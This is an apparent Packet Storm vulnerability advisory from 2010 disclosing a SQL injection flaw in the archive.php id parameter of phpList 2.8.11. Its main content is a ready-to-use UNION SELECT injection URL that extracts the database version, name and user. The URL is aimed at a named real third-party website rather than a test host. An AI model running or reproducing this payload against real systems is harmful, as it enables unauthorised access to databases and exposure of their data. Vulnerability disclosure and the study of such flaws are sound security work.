PHPList 2.8.11 SQL Injection

2010-06-09T00:00:00
ID PACKETSTORM:90434
Type packetstorm
Reporter d3v1l
Modified 2010-06-09T00:00:00

Description

                                        
                                            `[~]-----------------------------------------------------------------------------------------------------------------------   
[~] phplist version 2.8.11 SQL Injection Vulnerability   
[~]   
[~] http://www.phplist.com/   
[~]   
[~]   
[~] ----------------------------------------------------------------------------------------------------------------------   
[~] Bug founded by d3v1l [Avram Marius]   
[~]   
[~] Date: 08.05.2010   
[~]   
[~]   
[~] http://security-sh3ll.blogspot.com   
[~]   
[~] ----------------------------------------------------------------------------------------------------------------------   
[~] newmail/archive.php?id= SQL   
[~]   
[~]   
[~] Ex - The Information Security Writers Newsletter - website  
[~]   
[~] http://[site]/newmail/archive.php?id=   
[~]  
[~] http://www.infosecwriters.com/newmail/archive.php?id=-1 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19/*   
[~]------------------------------------------------------------------------------------------------------------------------  
`